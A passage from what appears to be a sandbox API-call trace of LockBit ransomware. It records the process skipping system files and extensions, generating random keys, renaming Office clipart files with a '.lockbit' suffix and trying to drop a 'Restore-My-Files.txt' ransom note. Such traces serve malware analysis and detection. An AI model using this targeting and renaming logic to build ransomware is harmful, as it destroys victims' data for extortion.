(lpString1=".mpa", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.889] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TAIL.WMF") returned -1 [0177.890] lstrcmpiW (lpString1="ntldr", lpString2="TAIL.WMF") returned -1 [0177.890] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TAIL.WMF") returned -1 [0177.890] lstrcmpiW (lpString1="bootsect.bak", lpString2="TAIL.WMF") returned -1 [0177.890] lstrcmpiW (lpString1="autorun.inf", lpString2="TAIL.WMF") returned -1 [0177.890] lstrcmpiW (lpString1="thumbs.db", lpString2="TAIL.WMF") returned 1 [0177.890] lstrcmpiW (lpString1="iconcache.db", lpString2="TAIL.WMF") returned -1 [0177.890] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.890] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TAIL.WMF") returned=".WMF" [0177.890] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.890] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.890] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.891] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.892] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.892] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.892] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.892] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.892] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.892] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TAIL.WMF.lockbit") returned 68 [0177.892] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TAIL.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tail.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.893] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.893] malloc (_Size=0x40068) returned 0x3d70450 [0177.893] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2230) returned 1 [0177.893] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.894] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0177.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.894] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0177.895] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0177.911] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TAIL.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TAIL.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.911] malloc (_Size=0x9e) returned 0x2073f40 [0177.911] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0x9e, FileInformationClass=0xa) returned 0x0 [0177.938] free (_Block=0x2073f40) [0177.938] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TAIL.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.938] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.938] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.938] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9583f00, ftCreationTime.dwHighDateTime=0x1bd4b32, ftLastAccessTime.dwLowDateTime=0x5ae692f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9583f00, ftLastWriteTime.dwHighDateTime=0x1bd4b32, nFileSizeHigh=0x0, nFileSizeLow=0xbde2, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00011_.WMF", cAlternateFileName="")) returned 1 [0177.938] lstrcmpiW (lpString1=".", lpString2="TN00011_.WMF") returned -1 [0177.938] lstrcmpiW (lpString1="..", lpString2="TN00011_.WMF") returned -1 [0177.938] PathFindExtensionW (pszPath="TN00011_.WMF") returned=".WMF" [0177.938] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.938] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.938] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.938] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.938] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.938] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.938] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.939] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.939] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00011_.WMF") returned -1 [0177.940] lstrcmpiW (lpString1="ntldr", lpString2="TN00011_.WMF") returned -1 [0177.940] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00011_.WMF") returned -1 [0177.940] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00011_.WMF") returned -1 [0177.940] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00011_.WMF") returned -1 [0177.940] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00011_.WMF") returned -1 [0177.940] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00011_.WMF") returned -1 [0177.940] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.940] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00011_.WMF") returned=".WMF" [0177.940] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.940] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.941] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.941] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.941] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00011_.WMF.lockbit") returned 72 [0177.942] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00011_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00011_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.978] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.978] malloc (_Size=0x40068) returned 0x3df0008 [0177.978] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=48610) returned 1 [0177.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.979] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.981] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00011_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00011_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.981] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.981] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.982] free (_Block=0x1fa2ed8) [0177.982] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00011_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.982] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.982] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.983] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5ae692f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1d5e, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00014_.WMF", cAlternateFileName="")) returned 1 [0177.983] lstrcmpiW (lpString1=".", lpString2="TN00014_.WMF") returned -1 [0177.983] lstrcmpiW (lpString1="..", lpString2="TN00014_.WMF") returned -1 [0177.983] PathFindExtensionW (pszPath="TN00014_.WMF") returned=".WMF" [0177.983] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.983] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.983] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.983] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.983] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.983] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.983] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.983] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.983] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.983] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.984] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.984] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00014_.WMF") returned -1 [0177.985] lstrcmpiW (lpString1="ntldr", lpString2="TN00014_.WMF") returned -1 [0177.985] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00014_.WMF") returned -1 [0177.985] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00014_.WMF") returned -1 [0177.985] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00014_.WMF") returned -1 [0177.985] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00014_.WMF") returned -1 [0177.985] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00014_.WMF") returned -1 [0177.985] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.985] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00014_.WMF") returned=".WMF" [0177.985] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.985] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.985] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.986] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.987] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.987] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.987] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.987] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.987] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.987] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00014_.WMF.lockbit") returned 72 [0177.987] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00014_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00014_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.988] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.988] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.988] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7518) returned 1 [0177.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, 